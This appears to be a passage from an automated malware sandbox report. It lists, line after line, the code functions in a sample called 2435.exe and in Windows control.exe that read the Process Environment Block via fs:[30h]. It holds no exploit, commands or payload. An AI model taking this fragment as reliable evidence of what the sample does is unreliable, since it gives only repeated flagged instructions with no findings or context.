Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]	1_2_00AAAC7B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]	1_2_00AAAC7B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]	1_2_00AAAC7B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]	1_2_00AAAC7B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]	1_2_00AAAC7B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]	1_2_00AAAC7B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]	1_2_00AAAC7B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]	1_2_00AAAC7B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]	1_2_00AAAC7B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]	1_2_00AAAC7B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h]	1_2_00AAAC7B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B0C450 mov eax, dword ptr fs:[00000030h]	1_2_00B0C450
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B0C450 mov eax, dword ptr fs:[00000030h]	1_2_00B0C450
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAA44B mov eax, dword ptr fs:[00000030h]	1_2_00AAA44B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA35A1 mov eax, dword ptr fs:[00000030h]	1_2_00AA35A1
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B405AC mov eax, dword ptr fs:[00000030h]	1_2_00B405AC
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B405AC mov eax, dword ptr fs:[00000030h]	1_2_00B405AC
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]	1_2_00AA1DB5
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]	1_2_00AA1DB5
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]	1_2_00AA1DB5
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]	1_2_00AA2581
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]	1_2_00AA2581
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]	1_2_00AA2581
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]	1_2_00AA2581
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]	1_2_00A72D8A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]	1_2_00A72D8A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]	1_2_00A72D8A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]	1_2_00A72D8A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]	1_2_00A72D8A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAFD9B mov eax, dword ptr fs:[00000030h]	1_2_00AAFD9B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAFD9B mov eax, dword ptr fs:[00000030h]	1_2_00AAFD9B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]	1_2_00B32D82
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]	1_2_00B32D82
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]	1_2_00B32D82
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]	1_2_00B32D82
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]	1_2_00B32D82
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]	1_2_00B32D82
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]	1_2_00B32D82
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B28DF1 mov eax, dword ptr fs:[00000030h]	1_2_00B28DF1
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]	1_2_00A8D5E0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]	1_2_00A8D5E0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]	1_2_00B3FDE2
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]	1_2_00B3FDE2
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]	1_2_00B3FDE2
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]	1_2_00B3FDE2
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]	1_2_00AF6DC9
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]	1_2_00AF6DC9
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]	1_2_00AF6DC9
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF6DC9 mov ecx, dword ptr fs:[00000030h]	1_2_00AF6DC9
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]	1_2_00AF6DC9
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]	1_2_00AF6DC9
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B48D34 mov eax, dword ptr fs:[00000030h]	1_2_00B48D34
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B3E539 mov eax, dword ptr fs:[00000030h]	1_2_00B3E539
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]	1_2_00AA4D3B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]	1_2_00AA4D3B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]	1_2_00AA4D3B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A7AD30 mov eax, dword ptr fs:[00000030h]	1_2_00A7AD30
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AFA537 mov eax, dword ptr fs:[00000030h]	1_2_00AFA537
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]	1_2_00A83D34
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]	1_2_00A83D34
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]	1_2_00A83D34
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]	1_2_00A83D34
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]	1_2_00A83D34
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]	1_2_00A83D34
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]	1_2_00A83D34
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]	1_2_00A83D34
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]	1_2_00A83D34
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]	1_2_00A83D34
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]	1_2_00A83D34
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]	1_2_00A83D34
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]	1_2_00A83D34
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9C577 mov eax, dword ptr fs:[00000030h]	1_2_00A9C577
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9C577 mov eax, dword ptr fs:[00000030h]	1_2_00A9C577
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB3D43 mov eax, dword ptr fs:[00000030h]	1_2_00AB3D43
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF3540 mov eax, dword ptr fs:[00000030h]	1_2_00AF3540
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B23D40 mov eax, dword ptr fs:[00000030h]	1_2_00B23D40
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A97D50 mov eax, dword ptr fs:[00000030h]	1_2_00A97D50
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF46A7 mov eax, dword ptr fs:[00000030h]	1_2_00AF46A7
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]	1_2_00B40EA5
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]	1_2_00B40EA5
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]	1_2_00B40EA5
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B0FE87 mov eax, dword ptr fs:[00000030h]	1_2_00B0FE87
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA16E0 mov ecx, dword ptr fs:[00000030h]	1_2_00AA16E0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A876E2 mov eax, dword ptr fs:[00000030h]	1_2_00A876E2
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B48ED6 mov eax, dword ptr fs:[00000030h]	1_2_00B48ED6
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA36CC mov eax, dword ptr fs:[00000030h]	1_2_00AA36CC
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB8EC7 mov eax, dword ptr fs:[00000030h]	1_2_00AB8EC7
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B2FEC0 mov eax, dword ptr fs:[00000030h]	1_2_00B2FEC0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A7E620 mov eax, dword ptr fs:[00000030h]	1_2_00A7E620
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B2FE3F mov eax, dword ptr fs:[00000030h]	1_2_00B2FE3F
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]	1_2_00A7C600
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]	1_2_00A7C600
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]	1_2_00A7C600
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA8E00 mov eax, dword ptr fs:[00000030h]	1_2_00AA8E00
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAA61C mov eax, dword ptr fs:[00000030h]	1_2_00AAA61C
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAA61C mov eax, dword ptr fs:[00000030h]	1_2_00AAA61C
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B31608 mov eax, dword ptr fs:[00000030h]	1_2_00B31608
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A8766D mov eax, dword ptr fs:[00000030h]	1_2_00A8766D
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]	1_2_00A9AE73
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]	1_2_00A9AE73
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]	1_2_00A9AE73
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]	1_2_00A9AE73
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]	1_2_00A9AE73
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]	1_2_00A87E41
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]	1_2_00A87E41
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]	1_2_00A87E41
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]	1_2_00A87E41
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]	1_2_00A87E41
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]	1_2_00A87E41
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B3AE44 mov eax, dword ptr fs:[00000030h]	1_2_00B3AE44
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B3AE44 mov eax, dword ptr fs:[00000030h]	1_2_00B3AE44
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]	1_2_00AF7794
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]	1_2_00AF7794
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]	1_2_00AF7794
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A88794 mov eax, dword ptr fs:[00000030h]	1_2_00A88794
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB37F5 mov eax, dword ptr fs:[00000030h]	1_2_00AB37F5
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A74F2E mov eax, dword ptr fs:[00000030h]	1_2_00A74F2E
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A74F2E mov eax, dword ptr fs:[00000030h]	1_2_00A74F2E
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9B73D mov eax, dword ptr fs:[00000030h]	1_2_00A9B73D
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9B73D mov eax, dword ptr fs:[00000030h]	1_2_00A9B73D
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAE730 mov eax, dword ptr fs:[00000030h]	1_2_00AAE730
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B0FF10 mov eax, dword ptr fs:[00000030h]	1_2_00B0FF10
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B0FF10 mov eax, dword ptr fs:[00000030h]	1_2_00B0FF10
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAA70E mov eax, dword ptr fs:[00000030h]	1_2_00AAA70E
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAA70E mov eax, dword ptr fs:[00000030h]	1_2_00AAA70E
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B4070D mov eax, dword ptr fs:[00000030h]	1_2_00B4070D
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B4070D mov eax, dword ptr fs:[00000030h]	1_2_00B4070D
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9F716 mov eax, dword ptr fs:[00000030h]	1_2_00A9F716
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A8FF60 mov eax, dword ptr fs:[00000030h]	1_2_00A8FF60
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B48F6A mov eax, dword ptr fs:[00000030h]	1_2_00B48F6A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A8EF40 mov eax, dword ptr fs:[00000030h]	1_2_00A8EF40
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]	9_2_0476AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]	9_2_0476AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]	9_2_0476AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]	9_2_0476AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]	9_2_0476AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]	9_2_0476AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]	9_2_0476AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]	9_2_0476AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]	9_2_0476AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]	9_2_0476AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]	9_2_0476AC7B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0475746D mov eax, dword ptr fs:[00000030h]	9_2_0475746D
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047CC450 mov eax, dword ptr fs:[00000030h]	9_2_047CC450
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047CC450 mov eax, dword ptr fs:[00000030h]	9_2_047CC450
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476A44B mov eax, dword ptr fs:[00000030h]	9_2_0476A44B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04808CD6 mov eax, dword ptr fs:[00000030h]	9_2_04808CD6
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476BC2C mov eax, dword ptr fs:[00000030h]	9_2_0476BC2C
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047B6C0A mov eax, dword ptr fs:[00000030h]	9_2_047B6C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047B6C0A mov eax, dword ptr fs:[00000030h]	9_2_047B6C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047B6C0A mov eax, dword ptr fs:[00000030h]	9_2_047B6C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047B6C0A mov eax, dword ptr fs:[00000030h]	9_2_047B6C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]	9_2_047F1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]	9_2_047F1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]	9_2_047F1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]	9_2_047F1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]	9_2_047F1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]	9_2_047F1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]	9_2_047F1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]	9_2_047F1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]	9_2_047F1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]	9_2_047F1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]	9_2_047F1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]	9_2_047F1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]	9_2_047F1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]	9_2_047F1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F14FB mov eax, dword ptr fs:[00000030h]	9_2_047F14FB
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047B6CF0 mov eax, dword ptr fs:[00000030h]	9_2_047B6CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047B6CF0 mov eax, dword ptr fs:[00000030h]	9_2_047B6CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047B6CF0 mov eax, dword ptr fs:[00000030h]	9_2_047B6CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0480740D mov eax, dword ptr fs:[00000030h]	9_2_0480740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0480740D mov eax, dword ptr fs:[00000030h]	9_2_0480740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0480740D mov eax, dword ptr fs:[00000030h]	9_2_0480740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0474849B mov eax, dword ptr fs:[00000030h]	9_2_0474849B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0475C577 mov eax, dword ptr fs:[00000030h]	9_2_0475C577
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0475C577 mov eax, dword ptr fs:[00000030h]	9_2_0475C577
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04757D50 mov eax, dword ptr fs:[00000030h]	9_2_04757D50
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_048005AC mov eax, dword ptr fs:[00000030h]	9_2_048005AC
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_048005AC mov eax, dword ptr fs:[00000030h]	9_2_048005AC
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04773D43 mov eax, dword ptr fs:[00000030h]	9_2_04773D43
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047B3540 mov eax, dword ptr fs:[00000030h]	9_2_047B3540
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047E3D40 mov eax, dword ptr fs:[00000030h]	9_2_047E3D40
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]	9_2_04743D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]	9_2_04743D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]	9_2_04743D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]	9_2_04743D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]	9_2_04743D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]	9_2_04743D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]	9_2_04743D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]	9_2_04743D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]	9_2_04743D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]	9_2_04743D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]	9_2_04743D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]	9_2_04743D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]	9_2_04743D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0473AD30 mov eax, dword ptr fs:[00000030h]	9_2_0473AD30
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047FE539 mov eax, dword ptr fs:[00000030h]	9_2_047FE539
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047BA537 mov eax, dword ptr fs:[00000030h]	9_2_047BA537
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04764D3B mov eax, dword ptr fs:[00000030h]	9_2_04764D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04764D3B mov eax, dword ptr fs:[00000030h]	9_2_04764D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04764D3B mov eax, dword ptr fs:[00000030h]	9_2_04764D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047E8DF1 mov eax, dword ptr fs:[00000030h]	9_2_047E8DF1
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0474D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0474D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0474D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0474D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047FFDE2 mov eax, dword ptr fs:[00000030h]	9_2_047FFDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047FFDE2 mov eax, dword ptr fs:[00000030h]	9_2_047FFDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047FFDE2 mov eax, dword ptr fs:[00000030h]	9_2_047FFDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047FFDE2 mov eax, dword ptr fs:[00000030h]	9_2_047FFDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047B6DC9 mov eax, dword ptr fs:[00000030h]	9_2_047B6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047B6DC9 mov eax, dword ptr fs:[00000030h]	9_2_047B6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047B6DC9 mov eax, dword ptr fs:[00000030h]	9_2_047B6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047B6DC9 mov ecx, dword ptr fs:[00000030h]	9_2_047B6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047B6DC9 mov eax, dword ptr fs:[00000030h]	9_2_047B6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047B6DC9 mov eax, dword ptr fs:[00000030h]	9_2_047B6DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04808D34 mov eax, dword ptr fs:[00000030h]	9_2_04808D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04761DB5 mov eax, dword ptr fs:[00000030h]	9_2_04761DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04761DB5 mov eax, dword ptr fs:[00000030h]	9_2_04761DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04761DB5 mov eax, dword ptr fs:[00000030h]	9_2_04761DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047635A1 mov eax, dword ptr fs:[00000030h]	9_2_047635A1
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476FD9B mov eax, dword ptr fs:[00000030h]	9_2_0476FD9B
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476FD9B mov eax, dword ptr fs:[00000030h]	9_2_0476FD9B
